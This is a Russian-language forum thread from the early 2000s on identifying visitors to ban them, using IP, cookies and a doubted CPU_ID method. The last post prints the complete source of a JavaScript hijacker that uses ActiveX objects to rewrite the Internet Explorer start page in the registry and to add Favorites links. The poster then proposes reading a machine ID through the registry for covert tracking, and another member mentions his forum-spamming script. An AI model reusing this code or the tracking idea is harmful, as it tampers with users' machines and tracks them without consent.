Перейти из форума на сайт.

НовостиФайловые архивы
ПоискАктивные темыТоп лист
ПравилаКто в on-line?
Вход Забыли пароль? Первый раз на этом сайте? Регистрация
Компьютерный форум Ru.Board » Интернет » Web-программирование » Закладки » Идентификация посетителя

Модерирует : Cheery

Cheery (21-02-2005 06:48): продолжаем тут алгоритм определения уникального посетителя  Версия для печати • ПодписатьсяДобавить в закладки

   

zapimir



Advanced Member
Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору
Есть 2 всем известных способа идентификации юзеров (например, для баннинга), это по IP и по Cookie. Есть ли еще какие-то способы. Админ borda.ru пишет, что у него возможен баннинг с использованием CPU_ID, кто-нибудь об этом что-то слышал?

Всего записей: 651 | Зарегистр. 28-10-2001 | Отправлено: 01:21 11-01-2002
Stek



Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Гонит.

----------
Интернет и деньги без дураков
Портабл программы, Бесплатные знакомства

Всего записей: 1544 | Зарегистр. 19-09-2001 | Отправлено: 04:07 11-01-2002
neo by

Newbie
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
согласен со Stek
 

Всего записей: 17 | Зарегистр. 03-01-2002 | Отправлено: 10:59 11-01-2002
hash



Member
Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору
zapimir
 
1. насчет CPU_ID гонит конечно
2. идентификация по IP не есть хорошо
 

Всего записей: 293 | Зарегистр. 07-12-2001 | Отправлено: 15:56 12-01-2002
Solid



BANNED
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
hash: А что ест хорошо, куки, которые не у всех поддерживаются?
 
CPU_ID - вообще тема Чисто прикольный админ

Всего записей: 143 | Зарегистр. 11-01-2002 | Отправлено: 17:43 12-01-2002
zapimir



Advanced Member
Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору
hash

Цитата:
идентификация по IP не есть хорошо  

Полностью согласен, поэтому на своем серваке использую комплексный метод идентификации (для баннинга) по Cookie, по Имени, по Email и IP. И никаких приколов типа баннинга целых подсетей.
Solid
Куки поддерживаются у большинства народа.
 
Хотя вот на днях пришлось еще с одной вещью бороться, это спам скриптами, т.е. была страничка с JavaScript'ом при нажатии кнопки скрипт генерил рандомное сообщение (т.к. одинаковые сообщения не проходят) и отправлял в книгу, вот такие у нас изобретательные люди бывают, хорошо еще что на JavaScript было написано, а то если подобное написать, например, на перле, то его вычислить намного сложнее будет

Всего записей: 651 | Зарегистр. 28-10-2001 | Отправлено: 18:08 12-01-2002 | Исправлено: zapimir, 18:11 12-01-2002
Stek



Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
zapimir
 
Хе хе, а я тут как то пхп скритец наваял, что он умел в рубоард в указанные темы с указанным ником мессаги слать. Мессаги брал из базы в 80.000 анекдотов, историй, афоризмов
 
Правда использовать мне тут его не разрешили, а то бы за сутки Батву по постингам обогнал

----------
Интернет и деньги без дураков
Портабл программы, Бесплатные знакомства

Всего записей: 1544 | Зарегистр. 19-09-2001 | Отправлено: 18:41 12-01-2002
zapimir



Advanced Member
Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору
Ну еще хорошо когда по теме сообщения, а когда 150 бессмысленных сообщений в день добавляется?
Хотя скоро сделаю фичу чтобы такие вещи были практически невозможны

Всего записей: 651 | Зарегистр. 28-10-2001 | Отправлено: 20:10 12-01-2002
VaaL2004



Junior Member
Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору

Цитата:
Есть 2 всем известных способа идентификации юзеров (например, для баннинга), это по IP и по Cookie. Есть ли еще какие-то способы. Админ borda.ru пишет, что у него возможен баннинг с использованием CPU_ID, кто-нибудь об этом что-то слышал?

 
Натыкался как-то на некий Trojan.Seeker (или что-то подобное). Так вот эта штука была написана на жабаскрипте и писала инфу в реестр (дбавляла нечто в избранное и в стартовую страницу), при этом, по-моему, предварительно чего-то даже оттуда читала.
В JS я мало чего понимаю, поэтому могу заблуждаться. Однако, вся эта мазута навела меня на мысль: чтение id компа из реестра средствами JavaScript
Предвижу несколько проблем:
1. Возможно ли это вообще, не ошибся ли я?
2. Как на это безобразие отреагируют антивирусы. На сколько я помню, DrWeb увидев этот файл взматюгнулся. А в активном состоянии я не проверял...
 
Содержимое того файла: virus.js

Код:
 
function AddFavLnk(loc, DispName, SiteURL)  
{  
var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");  
 Shor.TargetPath = SiteURL;  
Shor.Save();  
}  
function f(){  
try  
{  
a1=document.applets[0];  
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");  
a1.createInstance();  
Shl = a1.GetObject();  
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");  
a1.createInstance();  
FSO = a1.GetObject();  
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");  
a1.createInstance();  
Net = a1.GetObject();  
 
try{  
 
var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));  
document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"  
 
 
///////////////////////////////////////////////////////////////////////////////ЦчТі
 
 
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://chat.ru");  
var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));  
document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"  
var WF, Shor, loc;  
WF = FSO.GetSpecialFolder(0);  
loc = WF + "\\Favorites";  
 
if(!FSO.FolderExists(loc))  
{  
loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favorites";  
if(!FSO.FolderExists(loc))  
{  
return;  
}  
}  
 
///////////////////////////////////////////////////////////////////////////////КХІШјР
 
 
AddFavLnk(loc, " Самый крутой чат ", "http://chat.ru");  
AddFavLnk(loc, " Постоянное совершенствование системы чата ", "http://chat.ru");  
}  
catch(e){ }  
}  
catch(e){ }  
}  
function init(){  
setTimeout("f()", 1000);  
}  
init();
 

Так вот, может кто-нить возьмётся реализовать идею, если таковая осуществима?

Всего записей: 190 | Зарегистр. 25-12-2003 | Отправлено: 04:18 21-02-2005
   

Компьютерный форум Ru.Board » Интернет » Web-программирование » Закладки » Идентификация посетителя
Cheery (21-02-2005 06:48): продолжаем тут алгоритм определения уникального посетителя


Реклама на форуме Ru.Board.

Powered by Ikonboard "v2.1.7b" © 2000 Ikonboard.com
Modified by Ru.B0ard
© Ru.B0ard 2000-2024

BitCoin: 1NGG1chHtUvrtEqjeerQCKDMUi6S6CG4iC

Рейтинг.ru